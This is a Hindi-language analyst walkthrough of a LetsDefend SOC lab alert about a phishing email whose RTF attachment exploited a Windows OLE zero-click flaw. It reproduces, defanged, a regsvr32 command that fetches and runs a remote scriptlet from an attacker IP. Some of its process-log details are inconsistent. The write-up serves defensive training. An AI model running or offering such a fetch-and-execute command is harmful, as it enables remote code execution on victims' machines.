SOC336 - Windows OLE शून्य-क्लिक RCE शोषण का पता चला (CVE-2025-21298) Walkthrough
हमारे एक कर्मचारी ऑस्टिन को एक संदिग्ध प्रेषक से फ़िशिंग ईमेल प्राप्त हुआ और उसने 4 फरवरी, 2025 को शाम 4:18 बजे आउटलुक का उपयोग करके ईमेल खोलने के बाद एक अलर्ट ट्रिगर हुआ। ट्रिगर का कारण था "ज्ञात CVE-2025-21298 एक्सप्लॉइट पैटर्न के साथ पहचाना गया दुर्भावनापूर्ण RTF अटैचमेंट" .

EventID : 314
इवेंट समय : 4 फरवरी, 2025, शाम 4:18 बजे (मुझे लगता है कि यह गलत था)
नियम : SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)
स्तर : सुरक्षा विश्लेषक
SMTP पता : 84.38.130.118
स्रोत पता : [email protected]
गंतव्य पता : [email protected]
ईमेल विषय : महत्वपूर्ण: आगामी प्रोजेक्ट समय सीमा के लिए कार्रवाई आवश्यक
अटैचमेंट : mail.rtf
अटैचमेंट हैश : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
डिवाइस कार्रवाई : अनुमति दी गई
ट्रिगर कारण : ज्ञात CVE-2025-21298 एक्सप्लॉइट पैटर्न के साथ पहचाना गया दुर्भावनापूर्ण RTF अटैचमेंट।
आइए अलर्ट ट्राइएज के लिए ईमेल सुरक्षा, लॉग प्रबंधन और एंडपॉइंट सुरक्षा लॉग में गहराई से जाएं।

मैंने प्रेषक पते projectmanagement@pm[.]me की खोज की और उसी दिन सुबह 5:12 बजे भेजे गए ईमेल "महत्वपूर्ण: आगामी प्रोजेक्ट समय सीमा के लिए कार्रवाई आवश्यक" पर क्लिक किया, जो मेरे लिए अजीब था क्योंकि "महत्वपूर्ण" और "कार्रवाई आवश्यक" जैसे तत्काल स्वर और शब्दों ने मुझे फ़िशिंग ईमेल का संकेत दिया।

मैंने VirusTotal पर डोमेन pm[.]me की खोज की और केवल 1 विक्रेता ने इसे संदिग्ध बताया।

हालाँकि, जब मैंने SMTP पते 84[.]38[.]130[.]118 की खोज की, तो 7 विक्रेताओं ने इसे दुर्भावनापूर्ण और मैलवेयर के रूप में चिह्नित किया और यह SILVER C2 सर्वर से संबंधित था।


84[.]38[.]130[.]118 AbuseIPDB डेटाबेस में भी पाया गया। यह रीगा, रीगा, लातविया में स्थित है, डोमेन नाम rixhost.lv से संबंधित है और इसे DDoS हमला, हैकिंग और शोषित होस्ट के रूप में वर्गीकृत किया गया है।

अंत में मैंने VirusTotal पर अटैचमेंट mail.rtf के हैश df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 की खोज की और 61 में से 29 विक्रेताओं ने अटैचमेंट को दुर्भावनापूर्ण बताया। यह मैलवेयर परिवार rtfmalformb से संबंधित है और यह भेद्यता CVE-2025-21298 से जुड़ा था।
यह पुष्टि हुई कि ऑस्टिन को एक दुर्भावनापूर्ण अटैचमेंट वाला फ़िशिंग ईमेल भेजा गया था।
आइए जांच करें कि क्या सुबह 5:12 बजे के बाद जब ऑस्टिन ने फ़िशिंग ईमेल खोला तो कोई संदिग्ध गतिविधि हुई थी।

मैंने पहले प्रॉक्सी लॉग की जाँच की और प्रेषक के दुर्भावनापूर्ण IP पते 84[.]38[.]130[.]118 की खोज की, यह पता चला कि सुबह 8:06 बजे cmd.exe द्वारा शुरू किए गए URL hxxp://84[.]38[.]130[.]118/shell[.]sct के साथ दुर्भावनापूर्ण IP पते पर एक HTTP GET अनुरोध था, जो एक Windows स्क्रिप्टलेट फ़ाइल डाउनलोड कर रहा था। प्रतिक्रिया कोड 200 OK था, जो दर्शाता है कि आउटबाउंड ट्रैफ़िक की अनुमति दी गई थी और फ़ायरवॉल द्वारा अवरुद्ध नहीं किया गया था। एक स्क्रिप्ट फ़ाइल प्राप्त करना असामान्य था जिसमें संभवतः रिवर्स शेल स्क्रिप्ट थी।


चूँकि दुर्भावनापूर्ण IP पते पर आउटबाउंड ट्रैफ़िक cmd.exe द्वारा शुरू किया गया था, मैंने पहले टर्मिनल इतिहास की जाँच की और पाया कि सुबह 8:06:08 बजे एक कमांड "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" को scrobj.dll द्वारा दुर्भावनापूर्ण IP पते से स्क्रिप्ट फ़ाइल प्राप्त करने के लिए regsvr32.exe को स्पॉन करने के लिए निष्पादित किया गया था।
स्क्रिप्ट प्राप्त करने के लिए Windows में निर्मित उपयोगिताओं का उपयोग करने से सिस्टम पर न्यूनतम निशान छोड़े जा सकते हैं, जिससे रिवर्स इंजीनियरिंग और मैलवेयर विश्लेषण प्रक्रिया अधिक कठिन हो जाती है!

यह पुष्टि हुई कि कमांड के निष्पादन की घटना के बाद सुबह 8:06:42 बजे दुर्भावनापूर्ण IP 84[.]38[.]130[.]118 से एक कनेक्शन था।
तो केवल एक ईमेल पर क्लिक करने से cmd.exe क्यों निष्पादित हुआ? जबकि ऑस्टिन द्वारा mail.rtf के दुर्भावनापूर्ण अटैचमेंट को डाउनलोड करने का कोई सबूत नहीं मिला, मैंने एंडपॉइंट लॉग की जाँच की और सुबह 8:06 बजे के आसपास किसी भी घटना की खोज की।

प्रक्रिया आईडी: 7023
इवेंट समय: 4 फरवरी 2025 08:06:25
कमांडलाइन: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
पैरेंट प्रक्रिया: cmd.exe

ठीक है, तो चलिए पैरेंट प्रक्रिया cmd.exe देखते हैं
प्रक्रिया आईडी: 6784
इवेंट समय: 4 फरवरी 2025 08:06:08
कमांडलाइन: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
पैरेंट प्रक्रिया: outlook.exe

और अंत में outlook.exe की पैरेंट प्रक्रिया की जाँच की गई
प्रक्रिया आईडी: 4820
इवेंट समय: 4 फरवरी 2025 08:05:15
कमांडलाइन: "C:\Windows\System32\cmd.exe"
पैरेंट प्रक्रिया: explorer.exe
तो हम एक पेड़ में दुर्भावनापूर्ण प्रक्रियाओं का निष्कर्ष निकाल सकते हैं:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! स्क्रिप्ट का निष्पादन !
हालाँकि मैं अभी भी इस बात पर सवाल उठा रहा था कि दुर्भावनापूर्ण अटैचमेंट को डाउनलोड और खोले बिना दुर्भावनापूर्ण प्रक्रियाएँ कैसे शुरू हुईं, और outlook.exe ने दुर्भावनापूर्ण प्रक्रिया को कैसे जन्म दिया, जब तक कि मुझे CVE-2025-21298 के बारे में जानकारी नहीं मिली।

Offsec के लेख के अनुसार, जनवरी 2025 में CVSS स्कोर 9.8 के साथ एक महत्वपूर्ण Windows OLE जीरो-क्लिक भेद्यता थी जो ईमेल के माध्यम से RCE को सक्षम बनाती है। जब लक्षित प्राप्तकर्ता केवल Microsoft Outlook में एम्बेडेड स्क्रिप्ट वाले हानिकारक RTF दस्तावेज़ वाले दुर्भावनापूर्ण ईमेल को खोलता या पूर्वावलोकन करता है, तो भेद्यता ट्रिगर हो जाती है, जिससे हमलावर प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकता है।
मैंने Google और Gemini पर Windows OLE और RTF दस्तावेज़ की अपहरण प्रक्रियाओं के बारे में कुछ शोध किया और रिवर्स इंजीनियरिंग के अपने कुछ ज्ञान से संबंधित किया:






क्वारंटाइन नहीं किया गया

दुर्भावनापूर्ण

एक्सेस किया गया







वर्गीकरण: गंभीर
प्रकार: मैलवेयर
गतिविधि का समय:
4 फरवरी, 2025, सुबह 5:12 बजे (फ़िशिंग ईमेल प्राप्त हुआ)
4 फरवरी, 2025, सुबह 8:05:15 बजे - 4 फरवरी, 2025, सुबह 8:06:42 बजे (फ़िशिंग ईमेल खोला गया और दुर्भावनापूर्ण कोड निष्पादित किया गया)
प्रभावित संस्थाएँ:
स्रोत पता: projectmanagement@pm[.]me
SMTP पता: 84[.]38[.]130[.]118
प्राप्तकर्ता ईमेल पता: Austin@letsdefend[.]io
प्राप्तकर्ता आईपी पता: 172[.]16[.]17[.]137
होस्टनाम: ऑस्टिन
वास्तविक सकारात्मक के कारण:
4 फरवरी, 2025 को सुबह 5:12 बजे एक संदिग्ध ईमेल विषय "महत्वपूर्ण: आगामी प्रोजेक्ट समय सीमा के लिए कार्रवाई आवश्यक" [email protected] (आईपी पता: 84.38.130.118) से [email protected] (आईपी पता: 172.16.17.137) को एक अटैचमेंट mail.rtf (SHA256 हैश: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184) के साथ भेजा गया था। विषय में प्रयुक्त तत्काल स्वर और शब्दों ने फ़िशिंग ईमेल का संकेत दिया। थ्रेट इंटेल VirusTotal और AbuseIPDB ने प्रेषक के आईपी पते को चिह्नित किया, जो रीगा, रीगा, लातविया में स्थित है और डोमेन नाम rixhost.lv से संबंधित है और अटैचमेंट को दुर्भावनापूर्ण और मैलवेयर के रूप में चिह्नित किया।
प्रॉक्सी लॉग के अनुसार, सुबह 8:06 बजे cmd.exe द्वारा शुरू किए गए URL hxxp://84[.]38[.]130[.]118/shell[.]sct के साथ दुर्भावनापूर्ण IP पते पर एक HTTP GET अनुरोध था, जो एक Windows स्क्रिप्टलेट फ़ाइल डाउनलोड कर रहा था। प्रतिक्रिया कोड 200 OK था, जो दर्शाता है कि दुर्भावनापूर्ण IP पते पर आउटबाउंड ट्रैफ़िक की अनुमति दी गई थी और फ़ायरवॉल द्वारा अवरुद्ध नहीं किया गया था।
एंडपॉइंट सुरक्षा लॉग के अनुसार, दुर्भावनापूर्ण कोड "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) cmd.exe (PID: 6784) द्वारा शुरू किया गया था जो outlook.exe (PID: 4820) से स्पॉन हुआ था।
शोषण एक महत्वपूर्ण Windows OLE जीरो-क्लिक भेद्यता (CVE-2025-21298) के कारण हुआ था जो जनवरी 2025 में CVSS स्कोर 9.8 के साथ ईमेल के माध्यम से RCE को सक्षम बनाता है। जब लक्षित प्राप्तकर्ता केवल Microsoft Outlook में एम्बेडेड स्क्रिप्ट वाले हानिकारक RTF दस्तावेज़ वाले दुर्भावनापूर्ण ईमेल को खोलता या पूर्वावलोकन करता है, तो भेद्यता ट्रिगर हो जाती है, जिससे हमलावर प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकता है, संभावित रूप से C2 सर्वर पर एक रिवर्स शेल स्थापित कर सकता है।
एस्केलेशन के कारण:
जबकि सक्रिय पोस्ट-एक्सप्लॉइटेशन C2 नेटवर्क ट्रैफ़िक अभी तक निश्चित रूप से नहीं देखा गया है, एंडपॉइंट सुरक्षा लॉग ने scrobj.dll का उपयोग करके regsvr32.exe के निष्पादन की पुष्टि की है ताकि स्क्रिप्टलेट फ़ाइल shell.sct प्राप्त की जा सके। CVE-2025-21298 के CVSS स्कोर 9.8 के कारण, होस्ट पर किसी भी संदिग्ध गतिविधि की जाँच करने के लिए और जाँच की आवश्यकता है जैसे कि निरंतरता या डेटा एक्सफिल्ट्रेशन।
सुधारात्मक उपाय:
समझौता के संकेतक (IoC):